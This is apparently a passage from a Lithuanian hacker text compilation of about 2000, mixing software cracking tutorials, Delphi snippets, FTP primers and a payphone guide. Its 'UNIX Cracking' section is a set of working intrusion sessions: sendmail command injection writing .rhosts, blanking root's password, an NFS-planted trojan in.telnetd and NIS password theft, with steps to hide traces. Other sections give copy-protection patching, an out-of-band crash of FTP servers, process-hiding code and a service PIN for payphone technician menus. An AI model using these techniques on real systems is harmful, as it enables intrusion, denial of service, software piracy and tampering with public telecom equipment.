Vienintelis dalykas kurio mums reikia tai skaicius einantis po @offset, ne po @ bet po @offset na tik -h-nebereikia. Taigi mano atveju man bus reikalingas 0000F945 skaicius, jusu atveju, kitas(jau kartoti atsibodo) taigi dabar nusirase si skaiciu, paliekame Win32Dasm ir einame dabar prie HIEW. Hiew’e pasirenkame mus reikalinga EXE faila. Dabar spaudziame F4 ir pasirenkame Decode, paskui seka F5 paspaudimas. Taigi dabar parasome musu skaiciu, mano atveju, kaip zinome yra 0000F945 Dabar spaudziame enter, ir BOOM mes toje vietoje kur ir norime buti. Bet dabar as jums noriu pasakyti pagridndinius asemblerio kalbos JUMPUS:

ASM. —Ka reiskia

jne —Ivyksta suolis jei nelygu je —Ivyksta suolis jei lygu jmp —Bet kokiu atveju ivyksta suolis nop —Nieko neatlieka(no operation)

ja —Ivyksta suolis jei virsuje jna —Ivyksta suolis jei nevirsuje jae —Ivyksta suolis jei virsuje arba lygu jnae —Ivyksta suolis jei nevirsuje arba lygu jb —Ivyksta suolis jei zemiau jnb —Ivyksta suolis jei nezemiau jbe —Ivyksta suolis jei zemiau arba lygu jnbe —Ivyksta suolis jei nezemiau arba lygu jg —Ivyksta suolis jei didesnis jng —Ivyksta suolis jei nedidesnis jge —Ivyksta suolis jei didesnis arba lygu jnge —Ivyksta suolis jei nedidesnis arba lygu jl —Ivyksta suolis jei mazesnis jnl —Ivyksta suolis jei nemazesnis jle —Ivyksta suolis jei mazesnis arba lygu jnle —Ivyksta suolis jei nemazesnis arba lygu

Zinoma as suprantu, tai gali atrodyti is pradziu keblu, as pamenu, kai pats pirma karta tai pamaciau, O dieve galvojau, ir ka as cia bandau ismokti :)), bet kaip sakant kas bando tam ir pavyksta. Bet dabar jums tereikia pakeisti: Jei dydesnis, tai keiciate i Jei nedidesnis, tai yra jei yra JNE keiciate i JE ir atvirksciai, o linksmiausia dalis tame, kad netgi daugelis programu yra apsaugotos tokiu budu:). Taigi as dabar stoviu:

0000F945: 751D jne 0000F964

Taigi kaip jau supratote man reikia pakeisti, JNE i JE . Dabar jus pasakysite:”Na tai kas, kad as zinau ka i ka reikia keisti, bet KAIP man tai padaryti???” Taigi sakau reikia paprasciausiai pakeisti viena skaiciu, vienu daugiau arba vienu maziau. Taigi pas manes yra skaicius 751D ir JNE. Norint is JNE padaryti JE as turiu pakeisti 751D i 741D.

O jei butu pas manes JE tai tureciau atvirksciai ne atimti, bet prideti prie 5 .

Kartais buna, kad reikia isviso panaikinti operacija taigi, parasydami NOP vietoj JNE ar kas bebutu, tai darome parasydami 90 beje, jei jau mes turime atjungti operacija(NOP), tai isidemekite, kiek skaiciu turi ta eilute, Win32Dasme ant kurios mes stovejome, kai atlikome funkcija Go to code location isidemekite antra skaiciu is kaires, toje eiluteje kur stovite.

Jei skaicius pavyzdziui yra 751D tai ji keiciame 9090, jei 751D000000 tai ji turime pakeisti i 9090909090 vienu zodziu turime pakeisti skaiciu i skaiciu. Beje kai Hiew’e jus rasysite 90 nekreipkite demesio, kad eilute nusoka, paprasciausiai surasykite tiek 90 kiek reikia ir viskas.

Norint kad mums leistu keisti kanors, paspauskime F3 ir galime irasineti, o kai baigsite rasyti , tai paspauskite F9 – uzfiksavimui ir F10 – isejimui, ir viskas. Kartais buna, kad neiseina ne vienas auksciau isvardytas variantas. Tada paprasciausiai susirasykite visu JUMP’u @offset numerius einancius nuo zinutes i virsu ir juos keitaliokite, juk niekada negali buti uztikrintas kuris JUMP’as reikalingas.

PS: shis tutorialas yra sudetas ish keliu ir viskas surishta mano pachio mintimis;)

10. UNIX Cracking

Pvz No1.

crack% telnet target.remote.com 25

Connecting to 123.456.654.321.

! prisijungiam prie 25 porto – tai SMTP

220 sendmail SMI/4.3.5.2 ready

! versija kaip zhinome turi buga.

helo xxx

220 Helo xxx, ( crack.edu )

mail from: |echo crack.edu/.rhosts@target.remote.com

! statome komanda vietoj atgalinio adreso.

200 Sender ok.

rcpt to: nosuchuser

! ivedam ishanxto neteisinga adresata

500 nosuchuser: user unknown

! nekreipdami demesio i praneshima tesiame dialoga .

dataŽ

230 Enter mail, end with .

200 Mail accepted

! viskas mashina nulauzhta….

quitŽ

crack% su

! dabar ilendam taip kad musu nebutu matyti per who

# rsh target.remote.com /bin/csh -i

Welcome to remote.com!

Warning! No access to terminal, job control disabled!

target#

Pvz No2.

crack# su – bin

$ rsh target.remote.com /bin/csh -i

! Faile /etc/hosts.equiv yra uzhrashas + ir klaida…

Welcome to remote.com!

! Katalogas /etc su savininku bin…

Warning! No access to terminal, job control disabled!

% ls -ldg /etc drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/

% cd /etc

! Darom kad mums galima butu editinfi passwd …

% mv passwd passwd.was

% cp passwd.was passwd

! redaguojam

% ed passwd

2341Ž

1p root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh s/Nkkh5gkljGyj//p root::0:0:Root:/:/bin/csh w

2341

q

! Ir super useryje.

%echo /bin/csh -i | su root

Warning! No access to terminal, job control disabled!

target# mv /etc/passwd.was /etc/passwd

! Kad niekas nepastebetu ka mes dareme.

Pvz No3.

crack% showmount -e target.remote.com

Export list for target.remote.com

/home Everyone

/disk3 neptun pluton alpha

! Domeininej katalogaj prieinami per NFS

crack% su

# mount -t nfs target.remote.com:/home /mnt

# cd /mnt

! Mountinam kataloga sau

# ls -ldg *

drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/

# echo crack.eduŽ user/.rhosts

! Idiegiam .rhosts pas pas userius

# catŽ /etc/passwdŽ

user::257:20::/:

^DŽ

! sukuriam toki pati pas mumi

# su – userŽ

! Tampam juo

$ rsh target.remote.com /bin/csh -i

Warning! No access to terminal, job control disabled!

!Ir einam i svechius -)

% id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)

% ls -ldg /usr/etc

! Katalogas prieinamas writinimuj drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc

% grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd

!Radom programike kuri pasileis

!per roota ish musu katalogo

% cd /usr/etc

% mv in.telnetd in.telnetd1

! sukuriam trojana

% catŽ in.telnetd

#!/bin/sh exec /bin/csh -i

^D

% chmod 755 in.telnetd

! ir paleidzhiam ji

% telnet 127.1

Connecting 127.1.

Warning! No access to terminal, job control disabled!

# chown user /etc;

! Darom /etc savu

^M: command not found

# exit;

^M: command not found

Connection closed by foreign host.

% cd /etc

! o toliau kaip in Pvz No1.

Pvz No4.

! chekinam ar yra NIS Ž

crack% rpcinfo -p target.remote.com | grep bind

120000 2 udp 2493 ypbind

! yra toxaj ….

crack% ypx -o target.passwd -g target.remote.com

! pasimam paswordu faila crack% crack target.passwd

! leidzhiam passwd ieshkokli

[ a lot of time ]

OK, user user has password iamuser

! radom, uzheinam crack% telnet target.remote.com

! toliau viska kaip kad prieshtai buvusiam pvz .

– Hex –

(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)

Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet … heh susipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip yra daromi tokie darbai ir uzhduoda tokius klausimus … mazhdaug su kokia programele tu crackini ? ;

Informacion rulez and if u rule information …..

11. Delphi

Sios komandos skirtos programavimo kalbai – Delphi. Jos isbandytos su

5.0 versija.

……by ZErOnE

zerone@xxx.lt

1. Shut Down, Reboot, Standby funkcijos:

ExitWindowsEx(EWX_SHUTDOWN,0); { ShutDown }

ExitWindowsEx(EWX_REBOOT,0); { Reboot }

ExitWindowsEx(EWX_POWEROFF,0); { Standby }

2. Gauti pc IP adresa:

uses winsock;

function GetIPAddress: string;

var phoste:PHostEnt;

Buffer:array[0..100] of char;

WSAData:TWSADATA;

begin result:=”;

if WSASTartup($0101, WSAData) <> 0 then exit;

GetHostName(Buffer,Sizeof(Buffer));

phoste:=GetHostByName(buffer);

if phoste = nil then begin result:=’127.0.0.1′;

end else result:=StrPas(inet_ntoa(PInAddr(phoste^.h_addr_list^)^));

WSACleanup;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Label1.Caption:=GETIPAddress;

end;

3. Gauti win’u ir system foldery:

function GetWinDir: String;

var dir: array [0..max_path] of char;

begin

GetWindowsDirectory(dir, max_path);

result:=StrPas(dir);

end;

function GetSysDir: String;

var dir: array [0..max_path] of char;

begin

GetSystemDirectory(dir, max_path);

result:=StrPas(dir);

end;

procedure TForm1.Button1Click(Sender: TObject);

begin label1.caption:=GetWinDir;

label2.caption:=GetSysDir;

end;

4. Sisteminiu klavisu isjungimas/yhungimas (Alt+Tab, Alt+Ctrl+Del) :

var OldVal: LongInt;

begin

SystemParametersInfo (97, Word (True), @OldVal, 0); //disable

SystemParametersInfo (97, Word (False), @OldVal, 0); //enable end;

5. Pakeisti background’a :

SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(‘C:pvz.BMP’), SPIF_SendWININICHANGE);

6. Pakeisti peles pozicija :

SetCursorPos(600,600);

7. Gauti ScreenShot’a :

function GetScreenShot:TBitmap;

var

Desktop:HDC;

begin

Result:= TBitmap.Create;

Desktop:= GetDC(0);

try try

Result.PixelFormat:=pf32bit;

Result.Width:=Screen.Width;

Result.Height:=Screen.Height;

BitBlt(Result.Canvas.Handle,0,0,Result.Width,Result.Height,Desktop,0,0,SRCCOPY);

Result.Modified:=True;

finally

ReleaseDC(0,Desktop);

end;

except

Result.Free;

Result:=nil;

end;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Image1.Picture.Bitmap:=GetScreenShot;

end;

8. Darbas su .ini failais :

uses inifiles;

var ini: TIniFile;

var reiksme1:string; {nuskaitymas}

begin reiksme1:=ini.ReadString(‘Section’,’Edit1′,”);

label1.caption:=reiksme1;

end;

ini.WriteString(‘Section’,’Edit1′,edit1.text); {yrasimas}

procedure TForm1.FormCreate(Sender: TObject);

begin ini:= TIniFile.Create(‘c:test.ini’); {.ini failo sukurimas}

end;

9. Enable/Disable Start mygtuko :

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), TRUE); {enable}

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), FALSE); {disable}

10. paslepti/grazinti desktop’a :

ShowWindow(FindWindow(nil,’Program Manager’),SW_HIDE); {paslepti}

ShowWindow(FindWindow(nil,’Program Manager’),SW_SHOW); {grazinti}

11. Programos paslepimas :

const

RSP_SIMPLE_SERVICE = 1;

RSP_UNREGISTER_SERVICE = 0;

var function RegisterServiceProcess(dwProcessID, dwType: DWord):

DWord;stdcall;external ‘Kernel32.dll’ name ‘RegisterServiceProcess’;

{Ushsidek taimeri su intervalu 1}

procedure TForm1.Timer1Timer(Sender: TObject);

begin

Timer1.Enabled := False;

Form1.Visible := False;

RegisterServiceProcess(GetCurrentProcessID,RSP_SIMPLE_SERVICE);

Brush.Style := bsClear;

end;

{o kai uzdarysi forma daryk taip:}

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

RegisterServiceProcess(GetCurrentProcessID,RSP_UNREGISTER_SERVICE);

end;

12. Kopijuoti/Perkelti/Trinti folderius :

uses shellapi

function copydir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin wFunc := FO_COPY;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function movedir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin wFunc := FO_MOVE;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function deldir(dir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin wFunc := FO_DELETE;

fFlags := FOF_SILENT or FOF_NOCONFIRMATION;

pFrom := PChar(dir+#0);

end;

Result:=(0=ShFileOperation(fos));

end;

procedure TForm1.Button1Click(Sender: TObject);

begin if copydir(‘c:mp3′,’c:xxx’)=true then begin

ShowMessage(‘Dir copied.’);

end;

end;

12. Freecell for Windows 98 SE krekinimas

Info:

Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)

Irankiai: SoftICE, Betkoks šešioliktainis redaktorius (http://ucol.home.lt/cgi-bin/ucol.pl?l_tools)

Taikinys: Žaidimas „Freecell“

Intro:

Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti :]

Kam gi reikia krekinti „Freecell“? Jeigu žaidžiame šį žaidimą ir mums niekaip nesiseka jį sužaisti, taigi mes norime iš jo išeiti ir vėl pradėti iš naujo, bet išeinant pamatome dialogą: „Are you sure you want to quit this game?“. Jeigu spaudžiame „Yes“, tai mums užskaitomas pralaimėjimas, o mes to visai nenorime :] Todėl reikia padaryti, kad tas dialogas visai neiššoktų ir nebūtų užskaitytas pralaimėjimas.

Pora sakinių:

Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, šešioliktainius redaktorius ir assembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:

SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.

Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):

INIT=”CODE ON; X;”

EXP=c:windowssystemkernel32.dll

EXP=c:windowssystemuser32.dll

EXP=c:windowssystemgdi32.dll

Kombinacijos:

Ctrl+D – įeiti į SoftICE;

F5 – įšeiti iš SoftICE;

F10 – vykdyti programą po vieną eilutę;

F8 – jeigu esame ant procedūros, įeiti į ją.

Krekinimas:

Jūs laisvai galite nukrekinti ir „Freecell“ iš windows 95, ten viskas labai panašu, nes kiek žiūrėjau failų dydžiai skiriasi tik keliais baitais.

Įeiname į žaidimą (StartProgramsAccessoriesGamesFreecell). Paleidžiame jį (GameNew Game). Bandome išeiti iš jo. Pamatome dialogą: „Are you sure you want to quit this game?“. Spaudžiame „No“ (juk nenorime pralaimėti :)). Einame į SoftICE (Ctrl+D). Rašome: bpx messagebox. Išeiname iš SoftICE (F5). Vėl bandome išeiti. Aktyvuojasi SoftICE. Spaudžiame F11 (išėjimas iš proceduros). Pasirodo dialogas. Spaudžiame „No“. Vėl aktyvuojasi SoftICE. Štai ką matome:

:03D8 68D604 push ds ;dialogo parametras

:03DB 1E push 56c ;dialogo parametras

:03DC 686C05 push ds ;dialogo parametras

:03DF 6A24 push 24 ;dialogo parametras

:03E1 9A00009717 call user!messagebox ;iškviečiame dialogą

:03E6 3D0700 cmp ax,0007 ;ar buvo paspausta „No“

:03E9 0F846E04 jz 085b ;jeigu paspaudėme „No“ nedarom nieko

:03ED E8FE1A call 1eee ;užskaitome pralaimėjimą

:03F0 E80734 call 38ca ;užskaitome pralaimėjimą

:03F3 E9BFFE jmp 02b5 ;nošokame į išėjimą

Užsirašome pilkai pažymėtys baitus (68D6041E686C056A24). Jų mums prireiks vėliau. Taigi mums reikia praleisti dialogą ir pralaimėjimo užrašymą ir iš karto nušokti į išėjimą. Tuo mums puikiai pasitarnauja pirmasis dialogo parametras, kuris užima tiek baitų kiek ir išėjimo komanda (jmp 02b5). Todėl tą dialogo parametrą (push ds) reikia pakeisti komada jmp 02b5. Rašome: bpx 3d8.

Tai reiškia, kad SoftICE sustos toje vietoje, kai bus bandoma užkrauti pirmą dialogo parametrą. Išeiname iš SoftICE (F5). Bandome išeiti iš žaidimo. Aktyvuojasi SoftICE ties pirmu dialogo parametru. Rašome: a (tai reiškia, kad mes pakeisime komandą push ds kita). Dabar rašome jmp 02 b5 (keičiame komandą). Spaudžiame Enter, paskui Escape. Štai ką matome:

:03D8 E9DAFE jmp 02b5 ;nošokame į išėjimą

:03DB 1E push 56c

:03DC 686C05 push ds

:03DF 6A24 push 24

:03E1 9A00009717 call user!messagebox

:03E6 3D0700 cmp ax,0007

:03E9 0F846E04 jz 085b

:03ED E8FE1A call 1eee

:03F0 E80734 call 38ca

:03F3 E9BFFE jmp 02b5

Pasikeitė trys baitai, užsirašome raudonai pažymėtus (pasikeitusius) baitus (E9DAFE). Išeiname iš SoftICE (F5). Kartu su SoftICE užsidarė žaidimas ir nebuvo jokio dialogo. Einame į šešioliktainį redaktorių, atidarome faila freecell.exe, vykdome paiešką pagal pilkai pažymėtus užsirašytus baitus. Suradę juos, tris pirmus pakeičiame į raudonai pažymėtus užsirašytus baitus (E9DAFE), išsaugome failą. Išeiname iš šešioliktainio redaktoriaus.

Pabaiga:

Viskas žaidimas „nukenksmintas“. Pabandykite paleisti jį, šiek tiek jame pažaisti ir išeiti. Ką matote? Jokio dialogo išeinant! Vėl įeiname į žaidima, pažiūrime į rezultatus. Rezultatai tokie patys, pralaimėjimas neužskaitytas! Bet žaidimas iki galo dar nenukrekintas, nes dialogas atsiranda vykdant žaidimo meniu komandą „GameNew Game“ antrą kartą. Šitą dialogą pabandykite nukrekinti patys.

13. Domenas dykai

Nemokamos domainu dalintojos namezero hakas

Turbus daugelis zinot kompanija namezero http://www.namezero.com kuri nemokamai jums duoda domaina (com, net, org). Bet yra trukumas- ji jusu puslapio apacioje padaro frame`a, kuris gadina visa vaizda.

Pabandykime pagalvoti kaip jis padaro sita visa mesla. As manau jis daro taip: sukuria html dokumenta, kuris suskirstytas i du frame`us, kuriu vienas ira jusu svetaines tikrasis adresas, kitas namezero reklama.

Pasirodo to galima isvengti. Kaip taipadaryti?

I pagalba ateina JavaScript: jus savo puslapio titulineme dokumente iterpete JavaScript`uka, kuris jusu frame`a sulauzo, t.y. padaro per visa page`a. stai kaip atrodo sitas scriptas:

<script language=”JavaScript”>

<!– Slepeme nuo narsykliu, kurios nesupranta JavaScript

// Copyright © 2000 uid=o

// Created by SaTaN

//www.zemrsn.lt/uid0

if (self.parent.frames.length != 0)

self.parent.location=”index.html”;

//vietoj index.html galite/privalote rasyti jusu norima dokumenta, kuri suaktyvinus dingsta visi frame`ai

</script>

Kuo sitas budas yra blogas?

Nevisos narsykles supranta Javasript ir nevisi narsykleje JavaScript yra ijunge.

Beto jei jus norite issivaduoti tik is to namezero frame`o, o kitus, savo puslapio frame`us paliktitai jums neisdeks.

Iseitis: nenaudokite savo puslapyje frame`u arba padarykite izangini puslapi i jusu frame`ini puslapi, kureme ir bus visas frame`u zydymas.

Demonstracija viso sito galite pamatyti cia:

http://www.userid0.org

Tai yra uid=0 domainas, su nukilintu frame`u.

-=Visa sitai nera versta, kopijuota ar kitai pasisavinta is kitu dokumentu, saitu. Visa tai tik uid=0 sugalvota=-

14. FTP totorial`as

FTP (file transfer protocol)- failu perdavimo protokolas. Naudojantis siuo protokolu galima ivairia informacija failu pavidalu perduoti is vieno kompiuterio i kita, nepriklausomai nuo atstumo tarp kompiuteriu ar ju operaciniu sitemu. Tai vienas is budu perkelti jums reikalinga informacija is kito kompiuterio i savaji ir atvirksciai.

-= FTP reikalingas: =-

Padeti sureguliuoti failu (programu arba/ir duomenu) paskirstyma

Suteikti galimybe tiesiogiai ar netiesiogiai naudotis sistemos resursais

Apriboti vartotojo is kitos sistemos navigacija nutolusioje sistemooje

Efektyviai ir patikimai perduoti duomenis isvienos sistemos i kita

Failu perdavima is vienos sistemos i kita relizuoja dvi programos, naudojancios FTP protokola: programa-serveris, kuri veikia tolimoje sistemoje, ir programa-klientas, kuri aptarnauja norincius pasiimti/duoti failus tolimai sistemai.

Programa-serveris laukia uzklausos ir po to specialiu protokolu realizuoja failu siuntima is/i tolimos sistemos i/is prisijungusiji kompiteri ir taip pat aptarnuoja programa-klienta, t.y. priima ir siuncia specialias ftp komandas.

Programa-klientas prisijungia prie tolimos sistemos, siuncia failus is/i tolima sistema, kuria patogia (arba ne) vartotojo aplinka ir dialogus su vartotoju, transformuoja vartotojo komandas i standartinu ftp komandu seka ir perduoda ja kaip uzklausa ar atsakyma i uzskausa programai-serveriui.

Prisijunge prie tolimos sistemos, jus igaunate dauguma teisiu, kurias turetumete, jei naudotumetes TELNET (aisku prgramu vykdyti ar tikrinti pasto etc neiseis). Bet jus galesite trinti, perkelti, kopijuti etc failus (aisku jei jus turesite tam tikrus leidimus). Jusu teises priklauso nuo sistemos konfiguracijos ir aisku jusu vartotojo vardo (USERNAME).

Prisijungus prie kokio tai FTP serverio jus turite prisistatyti, t.y. nurodyti savo vartotojo varda (username) ir slaptazodi (password). Dauguma serveriu leidzia prisijungti su Anonymouse ar ftp vartotojo vardu (kur password buna jusu email). Tada jusu teises priklauso nuo serverio admino, bet dazniausiai jus tegalite failus tik parsiusti (kartais leidziama ideti failus i incoming kataloga).

Jei naudojates ne visualiu ftp klientu, tai jums reikes zinoti keleta komandu:

pwd – Parodo kokiame kataloge yra siuo metu vartotojas (t.y. jus)

cd – Keicia kataloga, kuriame jus esate mkdir – Sukuria kataloga rmdir – Istrina kataloga.

rename – Pervardina faila.

delete – Be komentaru get – Parsiunce faila is tolimos sistemos i jusiske put – Siunce faila is jusu sistemos i tolima

FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

http://cert.org

http://www.iss.net/cgi-bin/xforce/xforce_index.pl

http://packetstorm.genocide2600.com

http://www.rootshell.com

http://www.slashdot.org

15. FTP Tutorial 2

DIDELIS FTP TUTORIALAS NAUJOKAMS IR NE TIK

Sveiki, shiame tekste aprasysiu, kas yra FTP, kam jis naudojamas, keleta terminu ir siaip idomiu dalyku. Pirmiausia, tai jei tau yra labai nepatogu skaityt si teksta (ar kitus) kur reikia vazinet tai i kaire, tai i desine, tai tai yra todel, kad pas tave nepadarytas word wrap. Ji gali padaryt edit/word wrap.

DISKLEIMERIS:

Man yra visiskai nesvarbu, ka tu darysi paskaites si teksta, bet jei padarysi ka nors negero kaltink tik pats save, nes as ji rasiau tik tam, kad galetum apsisviest. >)

TURINYS:

1.0–Kas yra FTP ir kuo jis yra geras

2.0–FTP komandos

3.0–FTP hacking’as

4.0–Keletas FTP bugu

5.0–Keletas terminu naujokams

1.0 :

FTP (file transfer protokal) lietuviskai butu failu siuntimo protokolas. FTP serveriai leis tau ieiti su User Anonymous, o vietoj passwordo reikes irasyt savo e-maila. Aisku, jei tu turi useri ir zinai user passworda, tai geriau jungtis taip. Jei pasijungsi su Anonymous, tai tu turesi tik read-access. Taip pat galesi matyt tik labai ribota kieki failu.

Jei turi ten useri, tai turetum turet tada ir write-access. Tuomet galetum matyt visus isskyrus root-accsess fileus. FTP yra labai geras dalykas, nes kai prisijungi prie FTP serverio, po ji gali vaiksciot kaip po savo kompa.

Windowsams labai gera programa yra WS_FTP, nes ji labai patogi valdyti, ir langas, kuriame matai FTP serverio kompa bus panasus i Norton Commander langa. WS_FTP gali atsisiut is www.tucows.com arba kiek zinau ji yra ir mail.tiltas.lt FTP serveryje. FTP naudoja 21 porta.

2.0 :

Jei prie FTP servo jungies per DOS ar UNIX komanda FTP, tai tada turesi rinkt keleta tokiu komandu, jei noresi paziuret, nusiust ar atsisiut failus:

cd kaip ir UNIXe ar DOSe ji keicia direktorijas (folderius) kompe, kuriame esi lcd ji keicia tavo kompe direktorijas dir/ls parodo direktorijas ir failus, kurie yra direktorijoj kurioj esi get atsisiuti faila mget atsisiusti daug failu put nusiusti faila mput nusiusti daug failu pwd paraso, kurioje direktorijoj tu esi

3.0 :

FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

cert.org www.iss.net/cgi-bin/xforce/xforce_index.pl packetstorm.genocide2600.com www.rootshell.com www.slashdot.org

Sie saitai nera illegalus. Jie yra legalus ir jie paprasciau paaskina, kokios skyles gali buti jusu kompe ir panasiai.

Taip pat gali subscribeintis bugtraqe. Cia yra labai gera konferencija, tiems, kas domisi OS, ir programu exploitais, bugais. www.securityfocus.com

Siuose saituose tau reiktu ieskoti zodziu, tai yra OSu, programu. Pvz.: pasijungiu prie servo, ir matau, kad jis naudoja Mandrake Linux. Tada eini i kuri nors is isvardintu saitu, ir i searcha (ar kur kitur) Mandrake Linux 2.2.13. Tada ten gaunat keleta exploitu ir galbut iseis jums gauti root access!!! Bet aisku turbut apie tai tik svajot… Nu nesvarbu.

Jei nori suzinot FTP servo naudojama OS, bandyk jungtis su telnet’u per porta 21, 22, 23, 25. Ir panasiai. Taip pat per 25 porta jei iseis pasijungt, tai suzinosi ir naudojama Send-mail programa. O kaip zinoma, send-mail programos turi ivairiu exploitu…

4.0 :

Keletas siu bugu yra paprastos padarytos klaidos, ir jie nera kokie nors fantastiski. Jie cia yra surasyti tik tam, kad tu jei esi naujokas, galetum susipazinti su keletu exploitu.

Sie bugai yra paimti ne is kokiu nors dideliu hacking saitu, o is paprastu homepageu, kurie pamoko, kaip savoj sistemoj istaisyt klaidas.

1-bugas. FTP Bounce Attack (jis yra per ilgas, nueik i http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425)

2-bugas. Bet kas is isores galetu isjunkt FTP serveri. Ir jei dar FTP servas naudoja win 3.1 systema tikrai nusicrash’ins.

Programa: WinQVT/NET (tinka visos versios)

Exploitint: paprasciausiai issiusk OOB (Out of Band) i porta 21.

Kaip ji exploitint naujokams, ar tiems kurie tingi kaip nors vienaip ar kitaip terliotis: Su bet kokiu winnuke reikia issiust ta packeta (ar ka ten siuncia nukeas) ne i 139 porta, bet i 21 porta. Sis budas turetu tikrai suveikt ant win 3.1 ir kazka girdejau, kad WIN NT 4.0 turi ta pati bug’a…

Taip pat, kai pasijungi prie FTP servo su telnet, DOS, ar UNIX, pabandyk surinkt SYST komanda. Tau tada turetu ismest idomios informacijos apie ta kompa, tai yra: OS, bei info apie FTP serva.

5.0 :

1. Daemon – programa, kuri klauso, ar niekas nesijungia per koki nors porta, ir jei jungiasi, bendrauja su tuo, kas jungiasi.

2. Root – Useris, kuris UNIXe gali daryti VISISKAI KA NORI. Tai yra, jis gali keist kitu user’iu passwordus, kreatint naujus userius, trint ka tik nori, ir pan. pan…

3. Flames – kai ant kieno nors varai, tai yra vadini ji visokiu daunu, lochu, debilu, gejum ir pan. Flameinama paprastai per e-maila.

4. ISP – Internet service provider. Jei nesupranti angliskai, tai Interneto rysio tiekejas.

5. Read-access, write-access ir pan. – tai tam tikri tavo veiksmu apribojimai. Jei turi read-access, tai gali tik skaityti ir atsisiusti, ir tai ne visus failus. Jei turi write-access, tai gali irasyti i sistema ka nori, bet negali daryti ka nori. Root-access gali daryti KA TIK NORI.

Laukite sio texto papildymo…

Si texta rase spadofora. Ate

Iki pasimatymo NETE!

2000.05.21 17:05

16. Taksofonai zhaliems

Visishko idioto ivadas i praktine telefonija

„TAKSOFONAI ZHALIEMS”

Parenge: ww0lf

1999, Kaunas

Ishpostinus cyberia/MG failiuka apie taksofonu „Pulsar-50” meniu, susilaukeme didelio demesio ir labai daug klausimu, kas ten yra kaip 🙂

Pavarges atsakineti i klausimus, nutariau parashyti kiek ishsamesni teksta shia tema. Taigis…

Shiuo metu Lietuvoje labiausiai paplite yra „Pulsar-50” taksofonai, liaudyje vadinami „czipiniais”. Daugelis vartotoju linke naudotis jais kaip nurodo

„Lietuvos telekomo” instrukcija. Ir mazhai kas zhino, kad shis taksofonas –

tai mazhytis kompiuteris, kuri galima konfiguruoti, aktyvuoti vienas ar kitas funkcijas ir gauti ish jo aibe naudingos informacijos. Taksofonas valdomas per meniu, labai panashu i mobiliuju telefonu meniu, ir jeigu jums kada teko naudotis mobiliaku, jus visai nesunkiai susigaudysite.

Visa informacija taksofone pateikiama dvieju eilucziu skystuju kristalu (LCD)

ekrane (tame pacziame, kuriame jus matote jusu renkama numeri ir kiek jums liko kreditu). Musu tekste mes vaizduosime tai, ka jus matote ekrane kvadratiniuose skliaustuose, pvz:

[IDEKITE KORTELE ARBA]

[NEMOKAMAS NUMERIS ]

Tai, ka jus renkate taksofono klaviaturoje, vaizduosime figurinese skliaustuose, pvz:

{8191} – reishkia suspaudzhiame mygtukus 8 1 9 1

Paaishkinimas visishkam idiotui: klaviatura – tai taksofono mygtukai. 🙂

Taigi…

I meniu ieinama ivedus PIN koda , kurio uzklausimas pasirodo taksofono

LCD monitoriuje *stipriai* pakelus apatini-kairiji taksofono kampa.

Ishtikruju jis turi pasiridyti atidarius taksofona specialiuoju raktu, bet pakelus taksofono kampa mes emuliuojame jo atidaryma.

[PIN CODE ? : ]

Pin kodas yra keturiu skaitmenu ir dabar visoje Lietuvoje galiojantis pin kodas yra 3707.

Noredami ieiti i meniu surenkame:

{3707}

Ivedant pin koda, skaicziu ekrane nesimato, juos atstoja simbolis ‘*’:

[PIN CODE ? : *** ]

Ivedus pin koda, ekrane pasirodo pirmoji meniu opcija (opcija – meniu punktas):

[SETTINGS ]

Taksofono meniu yra valdomas taksofono mygtuku pagalba.

Mygtuku reikshmes:

<- 7 (i kaire: parodo sekanczia einamojo meniu opcija)

-> 9 (i desine: parodo priesh tai esanczia einamojo meniu opcija)

8 (iseiti is submeniu i aukstesnio lygio meniu)

0 (ieiti i submeniu arba keisti reiksme)

* (BACKSPACE funkcija – ishtrina paskutini ivesta skaitmeni)

# (ENTER funkcija – patvirtina pasirinktus ar ivestus duomenis )

Meniu struktura

